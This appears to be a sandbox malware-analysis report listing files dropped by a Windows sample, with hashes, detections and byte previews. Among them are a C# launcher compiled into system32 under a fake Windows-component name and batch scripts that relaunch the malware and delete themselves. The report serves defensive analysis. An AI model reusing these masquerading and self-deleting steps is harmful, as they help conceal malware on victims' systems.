                                                  SSDEEP:1536:5XZb8z78wjtQYeO9vDTwE0UaDnV8AQ6HiI37mZIyMVm/yH:5pAzjXeovDsE0UaDnaAQ6HiI3SZIyMVT
                                                  MD5:E91B4F8E1592DA26BACACEB542A220A8
                                                  SHA1:5459D4C2147FA6DB75211C3EC6166B869738BD38
                                                  SHA-256:20895FA331712701EBFDBB9AB87E394309E910F1D782929FD65B59ED76D9C90F
                                                  SHA-512:CB797FA758C65358E5B0FEF739181F6B39E0629758A6F8D5C4BD7DC6422001769A19DF0C746724FB2567A58708B18BBD098327BFBDF3378426049B113EB848E9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[..>...m...m...m...m...ms..l...my.cm...ms..l...ms..l...ms..l...m..l...mD..l...m...m...m..l...m..l...m.am...m..l...mRich...m........PE..d...=3.`.........." .........f.......................................................^....`.........................................`&..H....&.......`.......P..4....6.......p...... ...T...............................8...............@............................text............................... ..`.rdata...B.......D..................@..@.data........@......................@....pdata..4....P....... ..............@..@.rsrc........`.......*..............@..@.reloc.......p.......4..............@..B........................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\_decimal.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):271024
                                                  Entropy (8bit):6.526193734528701
                                                  Encrypted:false
                                                  SSDEEP:6144:1y+R2gXaCSVl9yYWDKsSaHlbVTimGDIrfp/AQx9qWMa3pLW1Aqe36bMNrCb:fXaCSr9kDjv//0OnDrCb
                                                  MD5:65287FD87A64BC756867A1AFDDEC9E29
                                                  SHA1:CDA1DB353F81DF7A4A818ADD8F87BCA9AC840455
                                                  SHA-256:DF19C2E6EC3145166FA8D206C11DB78BC1979A027105C4F21D40410B5082BA34
                                                  SHA-512:3E3F19CF965B260FFC68E45D5101234E8A957411C076A0D487D307DCFA714A9801CB501224FE7621937AEBDF90275F655C8A70DD6675BCFB5374404FDA53236F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q..H0.H0.H0.AH@.F0.$D.J0.$D.D0.$D.@0.$D.L0..D.K0..X.J0.H0..0..D.I0..D.G0..D.I0..D,.I0..D.I0.RichH0.........................PE..d...+3.`.........." .........H...............................................@............`.........................................p...P............ ..........X,...........0..`...p...T...............................8...............(............................text............................... ..`.rdata..............................@..@.data...X*.......$..................@....pdata..X,..........................@..@.rsrc........ ......................@..@.reloc..`....0......................@..B........................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\_hashlib.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):66224
                                                  Entropy (8bit):6.0452398780318815
                                                  Encrypted:false
                                                  SSDEEP:768:Pyz+AYBOBSFlUx/tF5IzZL0fpde9E9GD2Fe7POoJp3RIyYIeqDG4yvOhz:QfBSbyFy1kumGM4Oo/RIyYIeuyvy
                                                  MD5:7C69CB3CB3182A97E3E9A30D2241EBED
                                                  SHA1:1B8754FF57A14C32BCADC330D4880382C7FFFC93
                                                  SHA-256:12A84BACB071B1948A9F751AC8D0653BA71A8F6B217A69FE062608E532065C20
                                                  SHA-512:96DBABBC6B98D473CBE06DCD296F6C6004C485E57AC5BA10560A377393875192B22DF8A7103FE4A22795B8D81B8B0AE14CE7646262F87CB609B9E2590A93169E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^..^..^..&e.^...*..^...*..^...*..^...*..^..S*..^...6..^../7..^..^...^..S*..^..S*..^..S*..^..S*..^..Rich.^..........PE..d...>3.`.........." .....d..........XC.......................................0.......T....`.............................................P.................................... ..........T...........................P...8............................................text....b.......d.................. ..`.rdata..8R.......T...h..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\_lzma.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):162992
                                                  Entropy (8bit):6.767227461585096
                                                  Encrypted:false
                                                  SSDEEP:3072:ajV4pA1vcDRI45a4I9ihQsDPGAznfo9mNo6ndir1NZIyD1UsVM:ajV4pA10Dj5azDePlwYO6cr1NFVM
                                                  MD5:493C33DDF375B394B648C4283B326481
                                                  SHA1:59C87EE582BA550F064429CB26AD79622C594F08
                                                  SHA-256:6384DED31408788D35A89DC3F7705EA2928F6BBDEB8B627F0D1B2D7B1EA13E16
                                                  SHA-512:A4A83F04C7FC321796CE6A932D572DCA1AD6ECEFD31002320AEAA2453701ED49EF9F0D9BA91C969737565A6512B94FBB0311AEE53D355345A03E98F43E6F98B2
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0.C.0.C.0.C.HMC.0.C.D.B.0.C.D.B.0.C.D.B.0.C.D.B.0.C>D.B.0.C.X.B.0.C.0.C.0.C>D.B.0.C>D.B.0.C>D!C.0.C>D.B.0.CRich.0.C........PE..d...F3.`.........." .....|...........2....................................................`..........................................6..L....7..x............`.......`..........4...x...T..............................8...............8............................text...}z.......|.................. ..`.rdata..............................@..@.data........P.......4..............@....pdata.......`.......<..............@..@.rsrc................T..............@..@.reloc..4............^..............@..B................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\_socket.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):80048
                                                  Entropy (8bit):6.145505737856069
                                                  Encrypted:false
                                                  SSDEEP:1536:AeG2cHel7zjv5Qe9AM9/s+m+p7ncSrpZjxk1IyBwayyq:3IyzjeMAM9/sb+p4Srbji1IyBwD
                                                  MD5:FD1CFE0F0023C5780247F11D8D2802C9
                                                  SHA1:5B29A3B4C6EDB6FA176077E1F1432E3B0178F2BC
                                                  SHA-256:258A5F0B4D362B2FED80B24EEABCB3CDD1602E32FF79D87225DA6D15106B17A6
                                                  SHA-512:B304A2E56829A557EC401C6FDDA78D6D05B7495A610C1ED793D6B25FC5AF891CB2A1581ADDB27AB5E2A6CB0BE24D9678F67B97828015161BC875DF9B7B5055AE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j...........'.p.(..B..,..B.."..B..&..B..-.....,..u..)........../...../....../...../..Rich...................PE..d...;3.`.........." .....z...........(.......................................`.......=....`.........................................p...P............@.......0...............P..........T...........................P...8............................................text...ny.......z.................. ..`.rdata...y.......z...~..............@..@.data...(...........................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):846629
                                                  Entropy (8bit):5.4753143707660685
                                                  Encrypted:false
                                                  SSDEEP:24576:Phia1OtQcosQNRs54PK4ItaVwHEfVEZIwE0G:Phia1OicosQNRs54PK4IpQ
                                                  MD5:2ABE470164E060916C6842DA1263E5AD
                                                  SHA1:197163BFB26CE54420FA6EBA03CF0FA0A5622934
                                                  SHA-256:151A4C8EA261130B5AE94653E5470AC6FE4663DE269C187B2B38D6FCCADC1BAA
                                                  SHA-512:01E2C58B24F7D3D7B31DF97C6DBE8AEE0C0F61F457C78D62830FA954C17DFFB74B4E5389EF389926B5BA78F96DEB08AD4CD61C9ECEA256BF35E0A99CD2366D65
                                                  Malicious:false
                                                  Preview:PK..........!...=............_bootlocale.pyca....................................@....x...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nHz.e.j...W.n2..e.yh......e.e.d...rZd.d.d...Z.n.d.d.d...Z.Y.n.0.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.J...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin..r....

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\libcrypto-1_1.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3406016
                                                  Entropy (8bit):6.095119740432485
                                                  Encrypted:false
                                                  SSDEEP:98304:ZX+SicVMcqx5q6ypQ821CPwDv3uFfJwwzS:1FicVMcqx5q6yX21CPwDv3uFfJwwz
                                                  MD5:89511DF61678BEFA2F62F5025C8C8448
                                                  SHA1:DF3961F833B4964F70FCF1C002D9FD7309F53EF8
                                                  SHA-256:296426E7CE11BC3D1CFA9F2AEB42F60C974DA4AF3B3EFBEB0BA40E92E5299FDF
                                                  SHA-512:9AF069EA13551A4672FDD4635D3242E017837B76AB2815788148DD4C44B4CF3A650D43AC79CD2122E1E51E01FB5164E71FF81A829395BDB8E50BB50A33F0A668
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<.<.<.5.;...n...>.n...7.n...4.n...?.g...7.<.......!.....E.....=...W.=.....=.Rich<.................PE..d....El`.........." .....f$..........s........................................4......F4...`..............................................h...3.@.....3.|.....1.......3.......4..O...~,.8........................... .,...............3..............................text....d$......f$................. ..`.rdata........$......j$.............@..@.data....z...p1..,...L1.............@....pdata..d.....1......x1.............@..@.idata...#....3..$...43.............@..@.00cfg........3......X3.............@..@.rsrc...|.....3......Z3.............@..@.reloc...x....4..z...b3.............@..B........................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\python39.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4462768
                                                  Entropy (8bit):6.436862397697842
                                                  Encrypted:false
                                                  SSDEEP:49152:Fj3PQkQ7o11Nr9feH8NoaGh5A9lhIrcoFHuGxOCrls2Xtu6rfPa7w3J1AfkovlBl:RQkQ7o/Qeef6K3AroFVvrHRMRLwbCP
                                                  MD5:5CD203D356A77646856341A0C9135FC6
                                                  SHA1:A1F4AC5CC2F5ECB075B3D0129E620784814A48F7
                                                  SHA-256:A56AFCF5F3A72769C77C3BC43C9B84197180A8B3380B6258073223BFD72ED47A
                                                  SHA-512:390008D57FA711D7C88B77937BF16FDB230E7C1E7182FAEA6D7C206E9F65CED6F2E835F9DA9BEFB941E80624ABE45875602E0E7AD485D9A009D2450A2A0E0F1F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................... ........................N...............k..z..k.....k."....k.....Rich...........................PE..d....3.`.........." .....*#..n#.....DP........................................F.......D...`..........................................b<.....T(=.|....0F.......D.h/....C......@F..u...$.T........................... .$.8............@#.p............................text...T(#......*#................. ..`.rdata..p....@#.......#.............@..@.data...P....P=......<=.............@....pdata..h/....D..0...LA.............@..@.rsrc........0F......|C.............@..@.reloc...u...@F..v....C.............@..B................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\select.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28848
                                                  Entropy (8bit):6.167573133461333
                                                  Encrypted:false
                                                  SSDEEP:384:+Wu7bFYpo5K98HhIJg6mwhY6HqMGXYPAr70cE9o1IymGpMDG4y8lVJhj/:nykc6mwhBHqFY8p1IymGpMDG4yKhL
                                                  MD5:0E3CF5D792A3F543BE8BBC186B97A27A
                                                  SHA1:50F4C70FCE31504C6B746A2C8D9754A16EBC8D5E
                                                  SHA-256:C7FFAE6DC927CF10AC5DA08614912BB3AD8FC52AA0EF9BC376D831E72DD74460
                                                  SHA-512:224B42E05B4DBDF7275EE7C5D3EB190024FC55E22E38BD189C1685EFEE2A3DD527C6DFCB2FEEEC525B8D6DC35ADED1EAC2423ED62BB2599BB6A9EA34E842C340
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+.J~E.J~E.J~E.C...H~E.&.D.H~E.&.@.A~E.&.A.B~E.&.F.N~E...D.H~E...D.O~E.J~D..~E...H.K~E...E.K~E.....K~E...G.K~E.RichJ~E.........PE..d...;3.`.........." ....."...4............................................................`..........................................Q..L....Q..x............p..T....T..........@....B..T...........................0C..8............@..(............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data........`.......B..............@....pdata..T....p.......D..............@..@.rsrc................H..............@..@.reloc..@............R..............@..B................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1120944
                                                  Entropy (8bit):5.374356784466345
                                                  Encrypted:false
                                                  SSDEEP:12288:lezMmuZ63NNQCb5Pfhnzr0ql8L8kkM7IRG5eeme6VZyrIBHdQLhfFE+uB/v:lezumZV0m88MMREtV6Vo4uYB/v
                                                  MD5:7AF51031368619638CCA688A7275DB14
                                                  SHA1:64E2CC5AC5AFE8A65AF690047DC03858157E964C
                                                  SHA-256:7F02A99A23CC3FF63ECB10BA6006E2DA7BF685530BAD43882EBF90D042B9EEB6
                                                  SHA-512:FBDE24501288FF9B06FC96FAFF5E7A1849765DF239E816774C04A4A6EF54A0C641ADF4325BFB116952082D3234BAEF12288174AD8C18B62407109F29AA5AB326
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.T~~.:-~.:-~.:-w..-x.:-..;,|.:-..?,r.:-..>,v.:-..9,}.:-..;,}.:-%.;,|.:-~.;-4.:-..7,..:-..:,..:-...-..:-..8,..:-Rich~.:-........................PE..d...-3.`.........." .....J..........X).......................................@............`.............................................X............ .......................0......`L..T............................L..8............`...............................text....I.......J.................. ..`.rdata......`.......N..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.0.cs

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):381
                                                  Entropy (8bit):5.001175613389123
                                                  Encrypted:false
                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JRKVW1KEaiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLK0
                                                  MD5:2114D83B4088779676F153EB860B3892
                                                  SHA1:0B447115B8683B027F33E4B7AE22995F37683234
                                                  SHA-256:1852D09F0EA6066B64EEFFA187E08F3CF72A2DD7AD2365A71E8245E45F0C96F4
                                                  SHA-512:F8CC81B7A5887FC3F6BF6F1A84D4206A556291CD1E8FFA718FC2DDFD99F9FB77D9AB0EAD2129B3084E27557E08BE4A0665C1610FBE238EA72BFBD0A272F8A61E
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\NOFqHeDosUIopsPGLT.exe"); } catch { } }).Start();. }.}.

                                                  C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):250
                                                  Entropy (8bit):5.10459549683291
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fZUo:Hu7L//TRq79cQWfRZ
                                                  MD5:6290D4996F0E1EBFFB6E4BFECF26610C
                                                  SHA1:83D7A22F422C2B008C8D5864CAD2D87C4A9518BF
                                                  SHA-256:4BFB9E065ED124F47353B2C1F5FACA3D0E89457CC5F0B19CB5AC81EC102308CC
                                                  SHA-512:487AAA2C4122DEB7FFE973758F3C4F8C3DC05220CC3FEFA0AEE88BDED5CC6185BD16054375AD8594D0F80E2E8F964FC98A2B864D0F94C6ABE27B9F44DC91BD7B
                                                  Malicious:true
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.0.cs"

                                                  C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.out

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (310), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):731
                                                  Entropy (8bit):5.260905904364904
                                                  Encrypted:false
                                                  SSDEEP:12:TRI/u7L//TRq79cQWfRcKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/Vq79tWfWKax5DqBVKVrdFAMBJj
                                                  MD5:51705F0592956DC3F05E539E23BEE789
                                                  SHA1:F8E9DAAB1ADC774EB931DDCBC8F9F58B0862C763
                                                  SHA-256:2B3B6C2ABBFB9BC40BCA3C6D38F87460AB4B01DAECB441F1950CAF43E0618B01
                                                  SHA-512:86E96EADAA0B85EC9629D3A612F60E6B7021DF6C7BA36BFD0A0095A371915580B8F7A1CDB2E3B994EE98D704A3F2DE5C721ECEB3C3ACA2708ED958247F45EB13
                                                  Malicious:false
                                                  Preview:.C:\> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                  C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):194
                                                  Entropy (8bit):5.109556575951549
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9moE9TYSBktKcKZG1t+kiE2J5xAIE:hCijTg3Nou1SV+DEoUKOZG1wkn23f3ih
                                                  MD5:0241AD5AB8EA99665915B56EF9AE9519
                                                  SHA1:75F9CD69CA11E3D030633E9EE86DCDB3D7A47107
                                                  SHA-256:6648838CEF93A074583024BCA9392133088962DF1F58C4D3580F94B53258E324
                                                  SHA-512:F29A6E40D699B62D11361590EDF645BB2CF3B434B30D68851FDA24D4F4B06F4D053CE0E1CDF21F8EE201784B94351532B6BEFB311EF8953C5979A266606DBA84
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Chaindriver.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lrFP7pOB0Z.bat"

                                                  C:\Users\user\AppData\Local\Temp\sSQcZr2KXF

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.183465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:ScfhgPh1PSn:Su2Ph1qn
                                                  MD5:363C139ED732874608921CA4FB7113B0
                                                  SHA1:C2709C943368AE75E02A3F5948DD94608E56DBFC
                                                  SHA-256:9F354D4AB889108A95166113501789166C549B637417FC233DA3A91E5E45815F
                                                  SHA-512:BA3FEEC9EC2755E6A07304F0AFFE9AFBB8C0CC6971262553C0A3417C6E52A1CCBC06C4567D196733EC7EC5788B8453B0BC88EA154C19D92D305AD16F20D62802
                                                  Malicious:false
                                                  Preview:0VuGe38wDozDEjDPjnFQLij0K

                                                  C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat

                                                  Download File
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):210
                                                  Entropy (8bit):5.087865476001745
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE75N0BvKOZG1wkn23f+vCLqn:HTg9uYDE7LmDfdq
                                                  MD5:7653E52C4DECAEA0E61981EC451646C2
                                                  SHA1:3E35FCE50ACD8C234525A12ED9E66087D064089E
                                                  SHA-256:6DE1ED67523522C1C26CA7799ECA66AEEC649CC0621E46E652485AAA4FB02B07
                                                  SHA-512:E141AEEAD7FE200D22E5616EFE33F16D366E8863773604EA1BC1F576FCF25D2D25878A60BF61928AAB153447FE753440B3B9C0417B306111CFFD88CBD8966CB3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\Memory Compression.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zsJdcY9yPm.bat"

                                                  C:\Users\user\Desktop\BXpblVtN.log

                                                  Download File
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\FnBzuKhI.log

                                                  Download File
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\HTKiXRcY.log

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\KGIrVxyv.log

                                                  Download File
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
